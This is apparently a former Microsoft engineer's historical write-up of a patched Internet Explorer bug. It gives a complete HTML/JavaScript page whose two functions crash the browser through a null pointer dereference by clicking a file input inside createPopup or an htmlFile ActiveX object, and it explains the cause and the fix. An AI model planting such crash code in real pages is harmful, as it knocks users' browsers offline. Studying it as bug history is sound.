Programmatically calling .click() on an INPUT TYPE="FILE" element that lives inside a createPopup or htmlFile ActiveX crashes IE. The file picker dialog is designed to operate inside a real browser window, and being invoked from these off-screen document containers leads to a null pointer dereference.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Input TYPE FILE (CLICK Method Crash)</TITLE></HEAD>
<BODY>
<SCRIPT LANGUAGE="JavaScript">
function crashThrough_createPopup()
{
	var myCrashPop=createPopup();
	myCrashPop.document.body.innerHTML='<INPUT TYPE="FILE" ID="crashInput">';
	myCrashPop.document.all.crashInput.click();
}
function crashThrough_AXhtmlFile()
{
	var myCrashAX=new ActiveXObject("htmlFile");
	myCrashAX.write('<INPUT TYPE="FILE" ID="crashInput">');
	myCrashAX.close();
	myCrashAX.all.crashInput.click();
}
</SCRIPT>

<FONT SIZE="2" FACE="Tahoma">
Here are two ways to crash the Browser using the Click() method from the INPUT TYPE="FILE" object.<BR><BR>
<HR>
function <B>crashThrough_createPopup()</B><BR>
{<BR>
&nbsp;&nbsp;&nbsp;&nbsp;var myCrashPop=<FONT COLOR="BLUE"><B>createPopup()</B></FONT>;<BR>
&nbsp;&nbsp;&nbsp;&nbsp;myCrashPop.document.body.innerHTML='&lt;INPUT TYPE="FILE" ID="crashInput"&gt;';<BR>
&nbsp;&nbsp;&nbsp;&nbsp;myCrashPop.document.all.<B>crashInput.click()</B>;<BR>
}<BR>
<HR>
function <B>crashThrough_AXhtmlFile()</B><BR>
{<BR>
&nbsp;&nbsp;&nbsp;&nbsp;var myCrashAX=new <FONT COLOR="BLUE"><B>ActiveXObject("htmlFile")</B></FONT>;<BR>
&nbsp;&nbsp;&nbsp;&nbsp;myCrashAX.write('&lt;INPUT TYPE="FILE" ID="crashInput"&gt;');<BR>
&nbsp;&nbsp;&nbsp;&nbsp;myCrashAX.close();<BR>
&nbsp;&nbsp;&nbsp;&nbsp;myCrashAX.all.<B>crashInput.click()</B>;<BR>
}<BR>
<HR>
<BR>
<CENTER>
<INPUT TYPE="BUTTON" VALUE="crashThrough_createPopup()" ONCLICK="crashThrough_createPopup()">
<INPUT TYPE="BUTTON" VALUE="crashThrough_AXhtmlFile()" ONCLICK="crashThrough_AXhtmlFile()">
</CENTER>
</FONT>
</BODY>
</HTML>

Both createPopup and htmlFile create document contexts that are detached from a proper top-level window. When the file-picker code path tries to find a parent window to display the dialog, it encounters a null pointer. The fix was to guard the .click() method on file inputs against being called from these off-screen contexts.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.